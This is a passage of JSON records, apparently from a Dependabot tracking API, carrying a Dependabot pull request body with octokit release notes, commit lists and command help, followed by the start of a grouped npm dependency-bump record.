href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v13.1.1...v13.2.0\"\u003e13.2.0\u003c/a\u003e (2025-09-29)\u003c/h1\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003enew Projects v2 endpoints, new code scanning dismissal endpoints, many other endpoints (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/690\"\u003e#690\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/0e236cb76f82cfc073b381802e4fea03f59c213c\"\u003e0e236cb\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev13.1.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v13.1.0...v13.1.1\"\u003e13.1.1\u003c/a\u003e (2025-06-27)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ehandle url in response when using pagination with compareCommits (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/686\"\u003e#686\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/8e5da25f975d2f31dda6b8b588d71f2c768a8df2\"\u003e8e5da25\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev13.1.0\u003c/h2\u003e\n\u003ch1\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v13.0.1...v13.1.0\"\u003e13.1.0\u003c/a\u003e (2025-06-16)\u003c/h1\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadd paginatantion support for  \u003ccode\u003ecompareCommits\u003c/code\u003e and \u003ccode\u003ecompareCommitsWithBasehead\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/678\"\u003e#678\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/6d8ea8ad68058e45883a1a7edaaf6d8a91d732bd\"\u003e6d8ea8a\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev13.0.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v13.0.0...v13.0.1\"\u003e13.0.1\u003c/a\u003e (2025-05-25)\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/413e8990ce34854cb3a7d22f8a7366ea6a1eb0d5\"\u003e\u003ccode\u003e413e899\u003c/code\u003e\u003c/a\u003e feat: add immutable releases, enterprise team membership, enterprise team org...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/3d311d679e3d3ebaf073a66c5ce8a0603bf47d52\"\u003e\u003ccode\u003e3d311d6\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency \u003ccode\u003e@​types/node\u003c/code\u003e to v24 (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/701\"\u003e#701\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/ba56fbcc7e41a9ae19b5f2c09d4b94f8e4c7d70a\"\u003e\u003ccode\u003eba56fbc\u003c/code\u003e\u003c/a\u003e fix(deps): update \u003ccode\u003e@octokit/types\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/698\"\u003e#698\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/80745be518d862ab9a304ffb7793be4ebc3de0ce\"\u003e\u003ccode\u003e80745be\u003c/code\u003e\u003c/a\u003e ci(action): update actions/checkout action to v5 (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/687\"\u003e#687\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/0e236cb76f82cfc073b381802e4fea03f59c213c\"\u003e\u003ccode\u003e0e236cb\u003c/code\u003e\u003c/a\u003e feat: new Projects v2 endpoints, new code scanning dismissal endpoints, many ...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/bf19e3ed5f5e833712d2663984c4ce456696e93e\"\u003e\u003ccode\u003ebf19e3e\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency prettier to v3.6.2 (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/685\"\u003e#685\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/4f9fc562b1dda9d8f724e8ffee444141c2f45673\"\u003e\u003ccode\u003e4f9fc56\u003c/code\u003e\u003c/a\u003e ci(action): update actions/setup-node action to v5 (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/688\"\u003e#688\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/8e5da25f975d2f31dda6b8b588d71f2c768a8df2\"\u003e\u003ccode\u003e8e5da25\u003c/code\u003e\u003c/a\u003e fix: handle url in response when using pagination with compareCommits (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/686\"\u003e#686\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/6d8ea8ad68058e45883a1a7edaaf6d8a91d732bd\"\u003e\u003ccode\u003e6d8ea8a\u003c/code\u003e\u003c/a\u003e feat: add paginatantion support for  \u003ccode\u003ecompareCommits\u003c/code\u003e and `compareCommitsWith...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/8ec2713699ee473ee630be5c8a66b9665bcd4173\"\u003e\u003ccode\u003e8ec2713\u003c/code\u003e\u003c/a\u003e fix(deps): update \u003ccode\u003e@octokit/types\u003c/code\u003e - no new paginated endpoints (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/680\"\u003e#680\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v6.1.2...v14.0.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@octokit/request` from 6.2.8 to 10.0.8\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/octokit/request.js/releases\"\u003e@​octokit/request's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev10.0.8\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v10.0.7...v10.0.8\"\u003e10.0.8\u003c/a\u003e (2026-02-20)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003euse \u003ccode\u003ejson-with-bigint\u003c/code\u003e instead of built-in JSON methods in order to properly support int64's (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/798\"\u003e#798\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request.js/commit/f13f5d9814cec9e51cdbe57e3864f9a7f95a9731\"\u003ef13f5d9\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev10.0.7\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v10.0.6...v10.0.7\"\u003e10.0.7\u003c/a\u003e (2025-11-13)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003ereadme:\u003c/strong\u003e properly structure the options for custom agent (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/786\"\u003e#786\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request.js/commit/f17c1c13c7cba81187c419da06b815ed741c950c\"\u003ef17c1c1\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/octokit/request.js/issues/785\"\u003e#785\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev10.0.6\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v10.0.5...v10.0.6\"\u003e10.0.6\u003c/a\u003e (2025-10-30)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update dependency \u003ccode\u003e@​octokit/types\u003c/code\u003e to v16 (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/783\"\u003e#783\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request.js/commit/1aeac5672c04bc508e46796660465b1b67cf397c\"\u003e1aeac56\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev10.0.5\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v10.0.4...v10.0.5\"\u003e10.0.5\u003c/a\u003e (2025-09-29)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update octokit deps (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/772\"\u003e#772\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request.js/commit/30f83b64578eebf6988b44df495d235de8136e6e\"\u003e30f83b6\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev10.0.4\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v10.0.3...v10.0.4\"\u003e10.0.4\u003c/a\u003e (2025-09-29)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update dependency \u003ccode\u003e@​octokit/types\u003c/code\u003e to v15 (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/775\"\u003e#775\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request.js/commit/ad78b4c8099a790d9ac3489342021896cabdbecd\"\u003ead78b4c\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev10.0.3\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v10.0.2...v10.0.3\"\u003e10.0.3\u003c/a\u003e (2025-06-20)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003epkg:\u003c/strong\u003e unreplaced version number in \u003ccode\u003edist-bundle/\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/765\"\u003e#765\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request.js/commit/5b181af867a6b3ccfd23800d876ff22e1e54fd7d\"\u003e5b181af\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev10.0.2\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v10.0.1...v10.0.2\"\u003e10.0.2\u003c/a\u003e (2025-05-20)\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/f13f5d9814cec9e51cdbe57e3864f9a7f95a9731\"\u003e\u003ccode\u003ef13f5d9\u003c/code\u003e\u003c/a\u003e fix: use \u003ccode\u003ejson-with-bigint\u003c/code\u003e instead of built-in JSON methods in order to prop...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/9ba6ae0fd2eff35a6c29a9f032eca6e9ba002976\"\u003e\u003ccode\u003e9ba6ae0\u003c/code\u003e\u003c/a\u003e Document that unsuccessful HTTP status code result in an exception (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/795\"\u003e#795\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/7160b8201ee183d57e3572c9ac78aa3f241c9468\"\u003e\u003ccode\u003e7160b82\u003c/code\u003e\u003c/a\u003e chore(deps): replace glob with tinyglobby (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/791\"\u003e#791\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/ab8018b6d42de25adb305e3ea5ea840ee2805481\"\u003e\u003ccode\u003eab8018b\u003c/code\u003e\u003c/a\u003e ci(action): update peter-evans/create-or-update-comment action to v5 (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/776\"\u003e#776\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/fb916e454df205980835281368da81a003cde30d\"\u003e\u003ccode\u003efb916e4\u003c/code\u003e\u003c/a\u003e build(deps): bump vite from 6.3.4 to 6.4.1 (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/780\"\u003e#780\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/e1eb7693969a87cbdde278c82a7474b8acec9207\"\u003e\u003ccode\u003ee1eb769\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency esbuild to ^0.27.0 (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/784\"\u003e#784\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/f17c1c13c7cba81187c419da06b815ed741c950c\"\u003e\u003ccode\u003ef17c1c1\u003c/code\u003e\u003c/a\u003e fix(readme): properly structure the options for custom agent (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/786\"\u003e#786\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/ea46fa9cd46f970fad5e286e6fdd2ea46929ac5d\"\u003e\u003ccode\u003eea46fa9\u003c/code\u003e\u003c/a\u003e ci(action): update github/codeql-action action to v4 (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/778\"\u003e#778\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/8166d281814326b3e11d60b1895e623f2fd51c9e\"\u003e\u003ccode\u003e8166d28\u003c/code\u003e\u003c/a\u003e chore(deps): update vitest monorepo to v4 (major) (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/781\"\u003e#781\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/1aeac5672c04bc508e46796660465b1b67cf397c\"\u003e\u003ccode\u003e1aeac56\u003c/code\u003e\u003c/a\u003e fix(deps): update dependency \u003ccode\u003e@​octokit/types\u003c/code\u003e to v16 (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/783\"\u003e#783\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/octokit/request.js/compare/v6.2.8...v10.0.8\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~GitHub%20Actions\"\u003eGitHub Actions\u003c/a\u003e, a new releaser for \u003ccode\u003e@​octokit/request\u003c/code\u003e since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@octokit/request-error` from 3.0.3 to 7.1.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/octokit/request-error.js/releases\"\u003e@​octokit/request-error's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev7.1.0\u003c/h2\u003e\n\u003ch1\u003e\u003ca href=\"https://github.com/octokit/request-error.js/compare/v7.0.2...v7.1.0\"\u003e7.1.0\u003c/a\u003e (2025-11-13)\u003c/h1\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003einherit options from base \u003ccode\u003eError\u003c/code\u003e class to add support for the \u003ccode\u003ecause\u003c/code\u003e property (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/535\"\u003e#535\u003c/a\u003e/\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/536\"\u003e#536\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request-error.js/commit/2ea27805b93ed21d8cc423a6ad436513ecca0b55\"\u003e2ea2780\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.0.2\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request-error.js/compare/v7.0.1...v7.0.2\"\u003e7.0.2\u003c/a\u003e (2025-10-30)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update dependency \u003ccode\u003e@​octokit/types\u003c/code\u003e to v16 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/533\"\u003e#533\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request-error.js/commit/e5a75ef9cdede512185df71ffe5117c2b71027a9\"\u003ee5a75ef\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.0.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request-error.js/compare/v7.0.0...v7.0.1\"\u003e7.0.1\u003c/a\u003e (2025-09-29)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update dependency \u003ccode\u003e@​octokit/types\u003c/code\u003e to v15 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/522\"\u003e#522\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request-error.js/commit/4a453f21afbde9fc19d779518cb8e5f23d05038f\"\u003e4a453f2\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.0.0\u003c/h2\u003e\n\u003ch1\u003e\u003ca href=\"https://github.com/octokit/request-error.js/compare/v6.1.8...v7.0.0\"\u003e7.0.0\u003c/a\u003e (2025-05-20)\u003c/h1\u003e\n\u003ch3\u003eContinuous Integration\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003estop testing against NodeJS v18 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/512\"\u003e#512\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request-error.js/commit/8eee0c1eff4f247b714da5db9437787507e124df\"\u003e8eee0c1\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBREAKING CHANGES\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eDrop support for NodeJS v18\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003ebuild: set minimal node version in build script to v20\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eci: stop testing against NodeJS v18\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev6.1.8\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request-error.js/compare/v6.1.7...v6.1.8\"\u003e6.1.8\u003c/a\u003e (2025-04-10)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update dependency \u003ccode\u003e@​octokit/types\u003c/code\u003e to v14 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/505\"\u003e#505\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request-error.js/commit/ab4ea7b81bd8055060bfafa47b7eb13d89c7e475\"\u003eab4ea7b\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev6.1.7\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/2ea27805b93ed21d8cc423a6ad436513ecca0b55\"\u003e\u003ccode\u003e2ea2780\u003c/code\u003e\u003c/a\u003e feat: inherit options from base \u003ccode\u003eError\u003c/code\u003e class to add support for the \u003ccode\u003ecause\u003c/code\u003e ...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/ac7b3094475260d5bc95951d2040e38da8e88dd8\"\u003e\u003ccode\u003eac7b309\u003c/code\u003e\u003c/a\u003e chore(deps): update vitest monorepo to v4 (major) (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/531\"\u003e#531\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/dadc76ddc454c475f07525a8cd96fc29e4353cb1\"\u003e\u003ccode\u003edadc76d\u003c/code\u003e\u003c/a\u003e ci(action): update peter-evans/create-or-update-comment action to v5 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/525\"\u003e#525\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/f57f2e6b6fdc3578c3484c8939bcf56548b620eb\"\u003e\u003ccode\u003ef57f2e6\u003c/code\u003e\u003c/a\u003e build(deps): lock file maintenance (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/534\"\u003e#534\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/e5a75ef9cdede512185df71ffe5117c2b71027a9\"\u003e\u003ccode\u003ee5a75ef\u003c/code\u003e\u003c/a\u003e fix(deps): update dependency \u003ccode\u003e@​octokit/types\u003c/code\u003e to v16 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/533\"\u003e#533\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/e5d5de21540843d46e1dbd15696af8bdff9cf400\"\u003e\u003ccode\u003ee5d5de2\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency \u003ccode\u003e@​types/node\u003c/code\u003e to v24 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/532\"\u003e#532\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/8cc127bf725e581cdd32336669d322632e4392b4\"\u003e\u003ccode\u003e8cc127b\u003c/code\u003e\u003c/a\u003e ci(action): update actions/setup-node action to v6 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/529\"\u003e#529\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/b3a876bc68c0d044bf52eeaa513760e362d426e8\"\u003e\u003ccode\u003eb3a876b\u003c/code\u003e\u003c/a\u003e build(deps): lock file maintenance (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/527\"\u003e#527\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/cf1817b2c1bd15ffbf26bbf4390aa07084a10fce\"\u003e\u003ccode\u003ecf1817b\u003c/code\u003e\u003c/a\u003e ci(action): update github/codeql-action action to v4 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/528\"\u003e#528\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/61f1e8750fa8c1b7b57f4323ab13b92bb1017cf2\"\u003e\u003ccode\u003e61f1e87\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency tinybench to v5 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/519\"\u003e#519\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/octokit/request-error.js/compare/v3.0.3...v7.1.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\n\nDependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting `@dependabot rebase`.\n\n[//]: # (dependabot-automerge-start)\n[//]: # (dependabot-automerge-end)\n\n---\n\n\u003cdetails\u003e\n\u003csummary\u003eDependabot commands and options\u003c/summary\u003e\n\u003cbr /\u003e\n\nYou can trigger Dependabot actions by commenting on this PR:\n- `@dependabot rebase` will rebase this PR\n- `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it\n- `@dependabot show \u003cdependency name\u003e ignore conditions` will show all of the ignore conditions of the specified dependency\n- `@dependabot ignore \u003cdependency name\u003e major version` will close this group update PR and stop Dependabot creating any more for the specific dependency's major version (unless you unignore this specific dependency's major version or upgrade to it yourself)\n- `@dependabot ignore \u003cdependency name\u003e minor version` will close this group update PR and stop Dependabot creating any more for the specific dependency's minor version (unless you unignore this specific dependency's minor version or upgrade to it yourself)\n- `@dependabot ignore \u003cdependency name\u003e` will close this group update PR and stop Dependabot creating any more for the specific dependency (unless you unignore this specific dependency or upgrade to it yourself)\n- `@dependabot unignore \u003cdependency name\u003e` will remove all of the ignore conditions of the specified dependency\n- `@dependabot unignore \u003cdependency name\u003e \u003cignore condition\u003e` will remove the ignore condition of the specified dependency and ignore conditions\nYou can disable automated security fix PRs for this repo from the [Security Alerts page](https://github.com/hoopstreet/ish-devOps/network/alerts).\n\n\u003c/details\u003e","html_url":"https://github.com/hoopstreet/ish-devOps/pull/1","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/hoopstreet%2Fish-devOps/issues/1","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/1/packages"}},{"old_version":"2.21.3","new_version":"14.0.0","update_type":"major","path":null,"pr_created_at":"2026-05-02T01:21:03.000Z","version_change":"2.21.3 → 14.0.0","issue":{"uuid":"4367422683","node_id":"PR_kwDONns3ec7XkcoA","number":43,"state":"open","title":"Bump the npm_and_yarn group across 1 directory with 30 updates","user":"dependabot[bot]","labels":["dependencies","javascript"],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":null,"author_association":null,"state_reason":null,"created_at":"2026-05-02T01:21:03.000Z","updated_at":"2026-05-02T01:21:14.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"Bump","group_name":"npm_and_yarn","update_count":30,"packages":[{"name":"axios","old_version":"0.23.0","new_version":"0.31.0","repository_url":"https://github.com/axios/axios"},{"name":"js-yaml","old_version":"3.14.1","new_version":"3.14.2","repository_url":"https://github.com/nodeca/js-yaml"},{"name":"js-yaml","old_version":"4.1.0","new_version":"4.1.1","repository_url":"https://github.com/nodeca/js-yaml"},{"name":"node-forge","old_version":"1.3.0","new_version":"1.4.0","repository_url":"https://github.com/digitalbazaar/forge"},{"name":"@babel/traverse","old_version":"7.14.2","new_version":"7.29.0","repository_url":"https://github.com/babel/babel"},{"name":"@octokit/plugin-paginate-rest","old_version":"2.21.3","new_version":"14.0.0","repository_url":"https://github.com/octokit/plugin-paginate-rest.js"},{"name":"@tootallnate/once","old_version":"1.1.2","new_version":"removed","repository_url":"https://github.com/TooTallNate/once"},{"name":"body-parser","old_version":"1.19.0","new_version":"1.20.5","repository_url":"https://github.com/expressjs/body-parser"},{"name":"express","old_version":"4.17.1","new_version":"4.22.1","repository_url":"https://github.com/expressjs/express"},{"name":"brace-expansion","old_version":"1.1.11","new_version":"1.1.14","repository_url":"https://github.com/juliangruber/brace-expansion"},{"name":"braces","old_version":"3.0.2","new_version":"3.0.3","repository_url":"https://github.com/micromatch/braces"},{"name":"diff","old_version":"4.0.2","new_version":"4.0.4","repository_url":"https://github.com/kpdecker/jsdiff"},{"name":"flatted","old_version":"3.1.1","new_version":"3.4.2","repository_url":"https://github.com/WebReflection/flatted"},{"name":"got","old_version":"9.6.0","new_version":"removed","repository_url":"https://github.com/sindresorhus/got"},{"name":"json5","old_version":"1.0.1","new_version":"1.0.2","repository_url":"https://github.com/json5/json5"},{"name":"lodash","old_version":"4.17.21","new_version":"4.18.1","repository_url":"https://github.com/lodash/lodash"},{"name":"minimatch","old_version":"3.0.4","new_version":"3.1.5","repository_url":"https://github.com/isaacs/minimatch"},